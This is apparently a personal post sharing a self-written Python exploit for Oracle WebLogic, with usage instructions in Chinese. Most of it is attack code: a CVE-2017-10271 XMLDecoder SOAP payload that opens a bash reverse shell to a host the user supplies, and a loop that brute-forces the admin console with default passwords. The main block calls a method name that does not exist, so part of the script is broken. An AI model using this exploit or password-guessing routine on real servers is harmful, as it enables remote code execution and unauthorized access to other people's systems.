自己写的Weblogic的poc

"""
暂时只试用于Linux，先试试用一下反弹shell  CVE-2017-10271的EXp
"""
import requests
import sys
class Weblogic :
    def __init__(self,host,port,url) :
        self.url=url
        self.host=host
        self.port=port
    def CVE_2017_10271_Shell(self):
        url=self.url+"/wls-wsat/CoordinatorPortType"
        port=self.port
        host=self.host
        header={"Accept":"*/*","Accept-Language":"en","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Content-Type":"text/xml","Connection":"close","Host":self.url.replace("http://","")}
        data="""
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/{}/{} 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>""".format(self.host,self.port)
        Mikasa=requests.post(url,headers=header,data=data)
        print("请查看有没有获得Shell!!")
    def Shell_Cmd(self) :
        pass
    def Weak_Password(self):
        password=['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','mary']
        url=self.url+"/console/j_security_check"
        for user in password :
            for pwd in password :
                data={"j_username":user,"j_password":pwd,"j_character_encoding":"UTF-8"}
                test=requests.post(url,data=data,allow_redirects=False,verify=False)
                if 'console' in test.text and 'LoginForm.jsp' not in test.text :
                    print("存在弱口令!!!!")
                    print("user:"+user+"   password:"+pwd)
                    exit()
if __name__=='__main__' :
    exp=Weblogic(sys.argv[3],sys.argv[4],sys.argv[1])
    if sys.argv[2]=="CVE_2017_10271_Shell":
        exp.Reverse_Shell()
    elif sys.argv[2]=="Cmd":
        pass
    elif sys.argv[2]=="Weak_Password" :
        exp.Weak_Password()
    else :
        print("去屎吧2333333")
    print("CVE-2018-2628以及CVE-2018-2894也要去试试看，自己暂时还写不出这两个的exp")             

 使用方法:

反弹shell :    python3  exp.py  http://xxxx:7001/   CVE_2017_10271_Shell     host   port（后面的是你自己反弹Shell的主机ip以及端口）  

Weak密码检测:   python3 exp.py  http://xxxx:7001/    Weak_Password    xxx   xxx     (因为用的是类的构造函数整的，所以在进行其他方面的测试的时候会导致后面多一些东西，填任意的即可QAQ)